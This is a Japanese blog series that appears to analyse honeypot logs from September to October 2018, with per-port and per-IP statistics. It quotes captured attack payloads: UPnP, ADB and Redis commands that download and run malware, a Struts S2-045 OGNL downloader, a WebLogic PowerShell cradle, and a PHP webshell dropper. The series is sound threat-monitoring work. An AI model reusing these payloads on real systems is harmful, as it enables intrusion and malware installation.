ハニーポット月次分析 9月度〜EthereumとRedis〜
かなり遅くなってしまいましたが、9月に検知した通信のまとめ記事です。
9月度のHoneytrapのデータを纏めました。Ethereum関連の通信が一時的に増加、Redisに対する攻撃が印象的でした。
<Honeytrapでの検知数>
9/9ごろの増加傾向はEthereum関連が増加したことが原因となっています。
複数ポートへの通信が発生した際に増加しますが、毎日複数ポートへの通信が発生していないため、検知数がまばらになっています。
<宛先ポート別(円グラフ)>
それぞれの検知したポート宛で特に検知数が多かったものをサンプルとしていくつか記載しています。IoT製品および主要ポート(445,22など)が検知数としては多かった結果となりました。
※割合が0.5%以上のものがポート番号として表示
80ポートは除外
<443ポート>
調査行為相当の通信が大半で明確に攻撃を狙ったものは確認できませんでした。
◾️通信内容
.....SMBr.....S...................@..b..PC NETWORK PROGRAM 1.0..LANMAN1.0..Windows for Workgroups 3.1a..LM1.2X002..LANMAN2.1..NT LM 0.12.
<8545>
Ethereum関連の通信で9/8-9/17に大量検知したもので、id部分を変えて送信しているものがほとんどでした。
◾️通信内容
POST / HTTP/1.1
Host: xxx.xx.xxx.xxx:8545
User-Agent: Go-http-client/1.1
{"jsonrpc":"2.0","method":"eth_blockNumber","params":null,"id":30}
<ポート 22>
SSHの調査行為相当の通信を検知していました。
◾️通信内容
SSH-2.0-libssh2_1.4.3..
<ポート 1433>
ポート 1433 (Microsoft SQL Server)への通信で、特に攻撃を狙ったものはありませんでした。
◾️通信内容
...)............................U........
<ポート 5739>
Cookieにユーザ名をセットして、RDP経由で不正ログインを狙った通信と思われます。
◾️通信内容
...+&......Cookie: mstshash=hello..........
<ポート 3389>
Cookieにユーザ名をセットして、RDP経由で不正ログインを狙った通信と思われます。
◾️通信内容
...+&......Cookie: mstshash=hello..........
<ポート52869>
IoT製品を狙った攻撃を多く検知していました。
◾️通信内容
POST /picsdesc.xml HTTP/1.1
Host: xxx.xx.xxx.xx:52869
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget http://xxx.xxx.xx.xx/elf.mips -O elf`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> 331
<ポート 8080>
アクセス可能かどうかの調査行為の通信を検知していました。
◾️通信内容
GET / HTTP/1.1
Host: xxx.xx.xxx.xxx:8080
<ポート 81>
GoAhead Web Server をターゲットにした Server ヘッダの確認と思われます。サーバヘッダが一致していた場合、攻撃を継続する動作するとの報告もあります。
参考:IIJ Security Diary: Hajime ボットの観測状況
◾️通信内容
GET login.cgi HTTP/1.1
<ポート 6379>
Redisに対する攻撃を検知していました。
pastebinにスクリプトが記載されており、最終的にCoinMinerをダウンロードしてくるものと思われます。
◾️通信内容
set backuprd "\n*/1 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/5bjpjvLP||wget -q -O- hxxps://pastebin[.]com/raw/5bjpjvLP)|sh\n"..config set dir /etc/cron.d..config set dbfilename root..save..
<ポート 5555>
Android端末のコマンドラインツールADBを狙った通信。
Virustotal上ではmirai関連のマルウェアと判定されています。
◾️通信内容
CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://188[.]209[.]52[.]142/w -O -> w; sh w; rm w; curl http://188[.]209[.]52[.]142/c > c; sh c; rm c./
<攻撃元別IP>
攻撃元IPで検知数を纏めた結果、Ethereum関連を除くと主にcookieにセットして不正ログインを狙っている通信がほとんどでした。ツールを回して攻撃自体も簡単であり、成功時のリターンが大きいため、検知が多いのではないかと思います。
また、ヨーロッパやロシアからの攻撃が多く、アジアからの攻撃はほとんどありませんでした。
攻撃元IP |
国 | 検知数 | 内容 |
46[.]166[.]148[.]196 | オランダ | 27430 | ・ポート 8545宛への通信 ・Ethereum関連の通信で9/8-9/17に大量検知 ・詳細は 34-38日目:9/11-9/15 を参照 |
185[.]209[.]0[.]10 | ラトビア | 4455 | ・複数ポートへの通信を検知 ・通信内容は Cookie: mstshash=Administr ・cookie にセットすることで不正ログインを狙っている |
193[.]238[.]46[.]113 | ロシア | 3622 | ・複数ポートへの通信を検知 ・通信内容は Cookie: mstshash=Administr ・cookie にセットすることで不正ログインを狙っている |
77[.]72[.]83[.]48 | イギリス | 3457 | ・複数ポートへの通信を検知 ・通信内容は Cookie: mstshash=Administr ・cookie にセットすることで不正ログインを狙っている |
185[.]70[.]184[.]20 | オランダ | 3413 | ・5739ポート宛への通信 ・通信内容は Cookie: mstshash=hello ・cookie にセットすることで不正ログインを狙っている |
163[.]172[.]74[.]24 | フランス | 3054 | ・複数ポートへの通信を検知 ・通信内容は Cookie: mstshash=Administr ・cookie にセットすることで不正ログインを狙っている |
109[.]248[.]9[.]5 | イギリス | 2747 | ・複数ポートへの通信を検知 ・通信内容は Cookie: mstshash=hello ・cookie にセットすることで不正ログインを狙っている |
185[.]156[.]177[.]24 | ロシア | 2404 | ・複数ポートへの通信を検知 ・通信内容は Cookie: mstshash=Administr ・cookie にセットすることで不正ログインを狙っている |
103[.]53[.]224[.]95 | 香港 | 2107 | ・複数ポートへの通信を検知 ・通信内容は Cookie: mstshash=Administr ・cookie にセットすることで不正ログインを狙っている |
51[.]15[.]16[.]127 | オランダ | 1735 | ・ポート 1433 (Microsoft SQL Server)への通信 ・調査行為止まりであり、攻撃性はなし |
以上、9月度の分析結果となります。
ハニーポット簡易分析(63-67日目:10/9-10/13)
Honeytrap の簡易分析 63-67日目になります。
Honeytrap簡易分析結果
<検知数(80ポートを除く)>
10/9ごろより、検知数が増加しています。検知数の増加は以下のIPからの通信が増加したためでした。
IP | 検知数 | 割合 |
195[.]19[.]10[.]195 | 77,444 | 37.80% |
62[.]76[.]75[.]210 | 42,943 | 20.96% |
195[.]19[.]10[.]194 | 32,333 | 15.78% |
いずれもロシアからの通信であり、通信内容は「Cookie: mstshash=Test」であり、調査行為相当の通信と思われます。AbuseIPDBでも報告が上がっており、特にターゲットを絞らずに攻撃していると思われます。
<宛先ポート別検知数 TOP10>
※80ポートを除く
2018/10/9 19,929件
宛先ポート | 検知数 | 割合(%) | サービス |
445 | 3,027 | 15.19% | SMB |
113 | 506 | 2.54% | auth/IDENT |
8443 | 156 | 0.78% | ? |
3389 | 124 | 0.62% | RDP |
52869 | 103 | 0.52% | D-Link, Realtek SDK |
443 | 100 | 0.50% | HTTPS |
8080 | 94 | 0.47% | PROCY |
8008 | 81 | 0.41% | ? |
9001 | 76 | 0.38% | ? |
8000 | 72 | 0.36% | ? |
2018/10/10 6,450件
宛先ポート | 検知数 | 割合(%) | サービス |
445 | 2,853 | 44.23% | SMB |
81 | 697 | 10.81% | GoAhead Web Server |
4022 | 221 | 3.43% | ? |
9022 | 220 | 3.41% | ? |
8022 | 118 | 1.83% | ? |
222 | 116 | 1.80% | SSH |
2222 | 105 | 1.63% | SSH |
22 | 104 | 1.61% | SSH |
52869 | 94 | 1.46% | D-Link, Realtek SDK |
1433 | 70 | 1.09% | Microsoft SQL Server |
2018/10/11 19,939件
宛先ポート | 検知数 | 割合(%) | サービス |
445 | 2,984 | 14.97% | SMB |
81 | 1,850 | 9.28% | GoAhead Web Server |
22 | 644 | 3.23% | SSH |
8022 | 91 | 0.46% | ? |
222 | 88 | 0.44% | SSH |
3389 | 82 | 0.41% | RDP |
2222 | 71 | 0.36% | SSH |
10001 | 63 | 0.32% | ? |
1433 | 50 | 0.25% | Microsoft SQL Server |
8080 | 44 | 0.22% | PROCY |
2018/10/12 98,209件
宛先ポート | 検知数 | 割合(%) | サービス |
445 | 2,742 | 2.79% | SMB |
81 | 1,931 | 1.97% | GoAhead Web Server |
3389 | 82 | 0.08% | RDP |
2222 | 71 | 0.07% | SSH |
222 | 69 | 0.07% | SSH |
102 | 64 | 0.07% | iso-tsap |
22 | 58 | 0.06% | SSH |
8022 | 57 | 0.06% | ? |
1433 | 54 | 0.06% | Microsoft SQL Server |
8080 | 50 | 0.05% | PROCY |
2018/10/13 63,547件
宛先ポート | 検知数 | 割合(%) | サービス |
445 | 2,835 | 4.46% | SMB |
502 | 97 | 0.15% | Modbus Protocol |
81 | 68 | 0.11% | GoAhead Web Server |
3389 | 63 | 0.10% | RDP |
1433 | 51 | 0.08% | Microsoft SQL Server |
6379 | 35 | 0.06% | ? |
123 | 32 | 0.05% | NTP |
2082 | 32 | 0.05% | ? |
49 | 32 | 0.05% | TACACS |
4991 | 32 | 0.05% | VITA Radio Transport |
<ポート 81宛ての通信>
特定のIPからGoAhead Web Server が存在するかの調査行為の通信を大量に検知していました。内容はGETリクエストのみであるため、攻撃性はありませんでした。
リクエスト内容:
GET / HTTP/1.1
該当IP
※割合は81ポート宛てのみの割合
IP | 検知数 | 割合 |
58[.]39[.]124[.]19 | 3,629 | 63.67% |
150[.]249[.]168[.]234 | 1,304 | 22.88% |
以上、簡易分析となります。
ハニーポット簡易分析(53-62日目:10/1-10/8)
長らく更新が止まってしまいましたが、10/1-10/9までのHoneytrapの簡易分析の結果です。
<宛先ポートごとの割合(80ポートを除く)>
<宛先ポートごとの検知数(80ポートを除く)>
※割合が0.5%以上
宛先ポート |
検知数 | 割合(%) | サービス |
445 | 17843 | 45.3997 | SMB |
81 | 1082 | 2.75304 | GoAhead Web Server |
22 | 1029 | 2.61819 | SSH |
3389 | 700 | 1.78108 | RDP |
1433 | 460 | 1.17042 | Microsoft SQL Server |
52869 | 366 | 0.93125 | D-Link, Realtek SDK |
502 | 359 | 0.91344 | ? |
8080 | 329 | 0.83711 | PROCY |
5555 | 234 | 0.59539 | Android Debug Bridge |
8222 | 221 | 0.56231 | ? |
6379 | 206 | 0.52415 | Redis |
8545 | 201 | 0.51142 | Ethereum |
<ポート 81>
◾️リクエスト
GET / HTTP/1.1
Authorization: Basic YWRtaW46M2VkYzRyZnY=
◾️検知内容
Basic認証に関するリクエストで主にユーザー名:adminに対する総当たり攻撃でした。ここの集計はSplunkのサーチ文で抜き出しています。
<参考:利用したサーチ文>
※SplunkのApps DECRYPT が必要となります。
また、Honeytrapのログはjson形式で取り込んでいます。
| decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
| rex field="attack_connection.payload.data_decrypted" "Authorization\: Basic(?<Authorizationt_honeytrap>.+?)\."
| decrypt field="Authorizationt_honeytrap" atob emit('Authorizationt_honeytrap_decode')
<ポート 8545>
◾️リクエスト
POST / HTTP/1.1
User-Agent: EtherRpcWrapper v0.1
{"version": "1.1", "params": [], "method": "eth_blockNumber", "id": 1}..
◾️検知内容
Ethereumに関する通信で一時に比べるとかなり減少しましたが、未だに継続して検知しています。
<ポート 7001>
◾️リクエスト
POST /wls-wsat/CoordinatorPortType HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
~省略~
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
~省略~
◾️検知内容
WebLogic の WLS Security に対するコマンド実行(CVE-2017-10271)を狙った通信でPowerShellで難読化しています。難読化を解除すると以下の内容となります。
→ $OS=(Get-WmiObject Win32_OperatingSystem)Caption;$WC=New-Object NetWebClient;$WCHeadersAdd('User-Agent',"PowerShell/WL $OS");IEX $WCDownloadString('hxxp://121[.]17[.]28.[.]15/images/test/DLphp');
この宛先への通信はVTでは特にウイルス判定はないものの、Google先生ではいくつかヒットする内容となっています。おそらく、脆弱性があった場合に特定のURLへアクセスするだけの調査行為の通信と思われます。
主にMirai系のマルウェアがほとんどですが、yakuzaなどの日本語と思えるマルウェア名も検知していました。VTで確認する限り、明確にはmirai系と言い切れない結果であり、傾向が変化しているかもしれません。
以上、簡易分析となります。
ハニーポット簡易分析(52日目:9/30)
9/30 日分の検知ログとなりますが、今回は新規の検知がほとんどなく、補足で説明することもないような平和な検知状況でした。
9/30 5,099件 (Honeytrap)
◾️宛先ポート別(80ポートを除く)
ポート | 件数 | 割合 | サービス |
445 | 1,382 | 27.10% | SMB |
3389 | 381 | 7.47% | RDP |
22 | 156 | 3.06% | SSH |
222 | 93 | 1.82% | SSH |
6379 | 91 | 1.79% | Redis |
2222 | 83 | 1.63% | SSH |
8022 | 76 | 1.49% | ? |
81 | 71 | 1.39% | GoAhead Web Server |
1433 | 65 | 1.28% | Microsoft SQL Server |
52869 | 63 | 1.24% | D-Link, Realtek SDK |
◾️マルウェアダウンロード先
宛先ポート | マルウェアURL | 検知数 | VT |
5555 | hxxp://185[.]162[.]130[.]187/adbs2 | 1 | https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/ |
5555 | hxxp://188[.]209[.]52[.]142/c | 34 | https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection |
5555 | hxxp://95[.]215[.]62[.]169/adbs | 2 | https://www.virustotal.com/ja/url/d3c48b0b640ab29a353400425a1fa2e02a39983ea20c6ab70f67047d7013fcd5/analysis/ |
52869 | hxxp://104[.]248[.]189[.]214/tenshimips[.]mips | 33 | https://www.virustotal.com/#/url/cdb167260bf09c1b74b5fb932fd1647ba437f9b72a33317dc7ed81167beeed1e/detection |
52869 | hxxp://107[.]191[.]99[.]230/elf[.]mips | 19 | https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection |
52869 | hxxp://194[.]182[.]65[.]56/bins/apep[.]mips | 1 | https://www.virustotal.com/#/file/a0925fc32573e5f4edfbf4d321ebd9813f3f598c22d8e23105d1b3ab33c0cc1a/detection |
◾️WoWHoneypotの検知状況
Method | path | 検知数 |
GET | / | 33 |
GET | /.git/HEAD | 3 |
GET | /?XDEBUG_SESSION_START=phpstorm | 1 |
GET | /HNAP1/ | 1 |
GET | /cmx.php?cmd=echo "<?php \$func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';\$test=\$func('\$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e(\$x));');\$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>" >images.php & echo Hello, Peppa! | 1 |
GET | /console | 3 |
GET | /phpMyAdmin-3.0.1.1/scripts/setup.php | 13 |
GET | /phpMyAdmin/scripts/setup.php | 3 |
GET | /phpmyadmin/scripts/setup.php | 3 |
GET | /phpmyadmin3/scripts/setup.php | 12 |
GET | /pma/scripts/setup.php | 3 |
GET | /rgs.mng | 1 |
GET | /scripts/setup.php | 3 |
GET | /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr | 1 |
GET | http://112.35.88.28:10083/index.php | 1 |
HEAD | / | 1 |
HEAD | /static/admin/images/login_logo.png | 4 |
POST | /cmx.php | 1 |
POST | /images.php | 1 |
POST |
hxxp://check.proxyradar.com/azenv.php?auth=153823774681&a=PSCN&i=2685440439&p=80 |
1 |
以上、簡易分析となります。
ハニーポット簡易分析(43-51日目:9/20-9/29)
かなり更新が止まってしまいましたが、Honeytrap の簡易分析となります。
ポート別に見てみると、445ポート宛の通信が非常に多い割合です。通信内容としては調査行為止まりですが、未だに攻撃に利用されているポートの一つとなっています。
ポート22, 3389,8080の主要ポートに続き、IoT製品を狙ったポート52869(D-Linkなど)も多く観測されています。
◾️9/20 - 9/29 における宛先別ポート(80ポートを除く)
◾️宛先ポート別の割合
9/20 3,882 件
ポート | 件数 | 割合 | サービス |
445 | 1,814 | 46.73% | SMB |
22 | 152 | 3.92% | SSH |
3389 | 121 | 3.12% | RDP |
1433 | 73 | 1.88% | Microsoft SQL Server |
5555 | 54 | 1.39% | Android Debug Bridge |
8080 | 41 | 1.06% | PROXY |
6379 | 38 | 0.98% | Redis |
4567 | 33 | 0.85% | ? |
1194 | 30 | 0.77% | OpenVPN |
995 | 30 | 0.77% | POP3-SSL |
9/21 4,258 件
ポート | 件数 | 割合 | サービス |
445 | 1,795 | 42.16% | SMB |
22 | 213 | 5.00% | SSH |
8080 | 121 | 2.84% | PROXY |
6379 | 91 | 2.14% | Redis |
3389 | 82 | 1.93% | RDP |
2222 | 66 | 1.55% | SSH |
1433 | 63 | 1.48% | Microsoft SQL Server |
8180 | 49 | 1.15% | ? |
8081 | 38 | 0.89% | ? |
9200 | 34 | 0.80% | WSP |
9/22 4,234 件
ポート | 件数 | 割合 | サービス |
445 | 1,637 | 38.66% | SMB |
22 | 148 | 3.50% | SSH |
22222 | 117 | 2.76% | SSH |
8180 | 66 | 1.56% | ? |
8080 | 64 | 1.51% | PROXY |
1962 | 63 | 1.49% | BIAP-MP |
3389 | 59 | 1.39% | RDP |
1433 | 54 | 1.28% | Microsoft SQL Server |
47808 | 37 | 0.87% | bacnet |
81 | 37 | 0.87% | GoAhead Web Server |
9/23 5,555 件
ポート | 件数 | 割合 | サービス |
445 | 1,648 | 29.67% | SMB |
22 | 1,352 | 24.34% | SSH |
3389 | 99 | 1.78% | RDP |
1433 | 83 | 1.49% | Microsoft SQL Server |
8080 | 66 | 1.19% | PROXY |
10022 | 64 | 1.15% | ? |
5000 | 63 | 1.13% | UPnP |
52869 | 42 | 0.76% | D-Link, Realtek SDK |
2323 | 33 | 0.59% | TELNET |
28017 | 33 | 0.59% | ? |
9/24 5,120 件
ポート | 件数 | 割合 | サービス |
445 | 1,688 | 32.97% | SMB |
22 | 197 | 3.85% | SSH |
2222 | 72 | 1.41% | SSH |
3389 | 69 | 1.35% | RDP |
11022 | 64 | 1.25% | ? |
1433 | 55 | 1.07% | Microsoft SQL Server |
52869 | 43 | 0.84% | D-Link, Realtek SDK |
8080 | 40 | 0.78% | PROXY |
4899 | 35 | 0.68% | ? |
5555 | 33 | 0.64% | Android Debug Bridge |
9/25 5,864 件
ポート | 件数 | 割合 | サービス |
445 | 1,839 | 31.36% | SMB |
22 | 1,460 | 24.90% | SSH |
3389 | 99 | 1.69% | RDP |
222 | 88 | 1.50% | rsh-spx |
8022 | 72 | 1.23% | ? |
1433 | 67 | 1.14% | Microsoft SQL Server |
2222 | 58 | 0.99% | SSH |
8080 | 55 | 0.94% | PROXY |
5555 | 47 | 0.80% | Android Debug Bridge |
52869 | 34 | 0.58% | D-Link, Realtek SDK |
9/26 4,475 件
ポート | 件数 | 割合 | サービス |
445 | 1,858 | 41.52% | SMB |
503 | 192 | 4.29% | intrinsa |
3389 | 85 | 1.90% | RDP |
22 | 80 | 1.79% | SSH |
6379 | 70 | 1.56% | Redis |
2202 | 64 | 1.43% | SSH |
11022 | 64 | 1.43% | ? |
1433 | 63 | 1.41% | Microsoft SQL Server |
2222 | 39 | 0.87% | SSH |
8087 | 33 | 0.74% | ? |
9/27 4,241件
ポート | 件数 | 割合 | サービス |
445 | 1,857 | 43.79% | SMB |
33789 | 464 | 10.94% | ? |
22 | 162 | 3.82% | SSH |
222 | 96 | 2.26% | SSH |
8022 | 95 | 2.24% | ? |
2222 | 89 | 2.10% | SSH |
3389 | 61 | 1.44% | RDP |
1433 | 45 | 1.06% | Microsoft SQL Server |
6379 | 43 | 1.01% | Redis |
52869 | 40 | 0.94% | D-Link, Realtek SDK |
9/28 5,569件
ポート | 件数 | 割合 | サービス |
445 | 1,773 | 31.84% | SMB |
2202 | 218 | 3.91% | SSH |
22 | 119 | 2.14% | SSH |
3389 | 96 | 1.72% | RDP |
8022 | 81 | 1.45% | ? |
2222 | 72 | 1.29% | SSH |
6379 | 62 | 1.11% | Redis |
222 | 57 | 1.02% | SSH |
52869 | 57 | 1.02% | D-Link, Realtek SDK |
8080 | 54 | 0.97% | PROXY |
9/29 7,976件
ポート | 件数 | 割合 | サービス |
445 | 1,656 | 20.76% | SMB |
6379 | 271 | 3.40% | Redis |
22 | 188 | 2.36% | SSH |
3389 | 137 | 1.72% | RDP |
2222 | 129 | 1.62% | SSH |
222 | 102 | 1.28% | SSH |
8022 | 90 | 1.13% | ? |
8080 | 86 | 1.08% | PROXY |
1433 | 64 | 0.80% | Microsoft SQL Server |
8834 | 34 | 0.43% | ? |
◾️マルウェアダウンロード先
マルウェアについては傾向は大きく変更はありませんでした。いくつか解析していないURLもあることから、攻撃者側もダウンロード先を変更しているように思われます。
<気になった通信>
Apache Struts 2 の脆弱性 (S2-045) を狙った通信ですが、かなり複雑なコマンドになっています。ダウンロードのファイルの詳細までは確認していませんが、IoT系のマルウェアやマイナー系のルールではないと思われます。
GET /struts2-rest-showcase/orders.xhtml
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c del C:/Windows/temp/appveif.vbs&echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/Windows/temp/appveif.vbs&echo Set Shell = CreateObject("Wscript.Shell") >>C:/Windows/temp/appveif.vbs&echo Post.Open "GET","hxxp://a46[.]bulehero[.]in/download[.]exe",0 >>C:/Windows/temp/appveif.vbs&echo Post.Send() >>C:/Windows/temp/appveif.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/Windows/temp/appveif.vbs&echo aGet.Mode = 3 >>C:/Windows/temp/appveif.vbs&echo aGet.Type = 1 >>C:/Windows/temp/appveif.vbs&echo aGet.Open() >>C:/Windows/temp/appveif.vbs&echo aGet.Write(Post.responseBody) >>C:/Windows/temp/appveif.vbs&echo aGet.SaveToFile "C:/Windows/temp/appveif.exe",2 >>C:/Windows/temp/appveif.vbs&echo wscript.sleep 10000>>C:/Windows/temp/appveif.vbs&echo Shell.Run ("C:/Windows/temp/appveif.exe")>>C:/Windows/temp/appveif.vbs&C:/Windows/temp/appveif.vbs').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
マルウェアURL先: https://www.virustotal.com/#/file/452fec0a680e9f11334e75a0ad8f7f2b837676f08303d935b5ad188f218dcd8b/detection
他にも気になる通信はあったので、ちょくちょくとブログに書いていこうと思います。
簡易分析は以上となります。
*1:#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
ハニーポット簡易分析(40-42日目:9/17-9/19)
9/17-9/19 のHonetyrapにおける簡易分析となります。
9/17までは Ethereumに関する通信が多かったですが、9/18には数が激減しました。
それ以降は特に通信の傾向変化はありませんでした。
◾️4786に関する通信について
検知数は多くないですが、Cisco Smart Install Client が使用する 4786/tcp ポートに対する攻撃を観測していました。TFTPサーバからコンフィグを読み込んで、設定するような通信と思われます。ただし、xxxの部分はこのサーバのIPであり、IPからの通信があるかの調査行為かもしれません。
<ペイロード>
copy flash:/config.text tftp://222[.]211[.]78[.]73/xxx.xx.xxx.xxx.conf
◾️宛先ポートごとの検知数(80ポートを除く)
9/17 6561件 | |||
宛先ポート | 件数 | 割合 | サービス |
8545 | 1,811 | 27.60% | Ethereum |
445 | 1,769 | 26.96% | SMB |
22 | 360 | 5.49% | SSH |
52869 | 78 | 1.19% | D-Link, Realtek SDK |
1433 | 70 | 1.07% | Microsoft SQL Server |
22022 | 64 | 0.98% | ? |
6379 | 54 | 0.82% | Redis |
3389 | 49 | 0.75% | RDP |
81 | 38 | 0.58% | GoAhead Web Server |
5555 | 36 | 0.55% | Android Debug Bridge |
9/18 4746件 | |||
宛先ポート | 件数 | 割合 | サービス |
445 | 1,824 | 38.43% | SMB |
22 | 671 | 14.14% | SSH |
3389 | 229 | 4.83% | RDP |
1433 | 74 | 1.56% | Microsoft SQL Server |
8080 | 73 | 1.54% | Proxy |
52869 | 46 | 0.97% | D-Link, Realtek SDK |
81 | 43 | 0.91% | GoAhead Web Server |
636 | 34 | 0.72% | LDAPS |
6379 | 34 | 0.72% | Redis |
7657 | 33 | 0.70% | ? |
9/19 3089件 | |||
宛先ポート | 件数 | 割合 | サービス |
445 | 1,540 | 49.85% | SMB |
3389 | 124 | 4.01% | RDP |
81 | 68 | 2.20% | GoAhead Web Server |
22022 | 64 | 2.07% | ? |
1433 | 50 | 1.62% | Microsoft SQL Server |
52869 | 47 | 1.52% | D-Link, Realtek SDK |
8080 | 46 | 1.49% | Proxy |
6379 | 38 | 1.23% | Redis |
6666 | 36 | 1.17% | IRC |
137 | 32 | 1.04% | NetBIOS Name Service |
◾️マルウェアダウンロード
こちらは特に傾向の変化はありませんでした。
以上、簡易分析となります。
ハニーポット簡易分析(39日目:9/16)
ハニーポット(Honeytrap)簡易分析の9/16日分となります。
<宛先ポート別TOP10>
9月16日:8594件 | |||
宛先ポート | 件数 | 割合 | サービス |
8545 | 2,905 | 33.80% | Ethereum |
1433 | 2,165 | 25.19% | Microsoft SQL Server |
445 | 1,580 | 18.39% | SMB |
22 | 88 | 1.02% | SSH |
3390 | 73 | 0.85% | ? |
3389 | 58 | 0.68% | RDP |
52869 | 38 | 0.44% | D-Link, Realtek SDK |
81 | 34 | 0.40% | GoAhead Web Server |
465 | 33 | 0.38% | SMTPS |
2455 | 32 | 0.37% | wago-io-system |
◾️Microsoft SQL Serverへのアクセス
パッと、ペイロードを確認する限りは特に攻撃と思われる文字列はありませんでした。BOFなどであった場合、デコードしても特に意味はないと思うので、ここらの検知をどうするかは課題の一つだと考えています。IDSをちゃんと検知できるようにチューニングしなければ。。。。。
HEX表記:
1201002900000000000015000601001b000102001c000103001d0004ff0800015500000000f00b0000
デコード後:
...)............................U........
<マルウェアダウンロード>
マルウェアは新規で検知したものはありませんでした。
以上、簡易分析となります。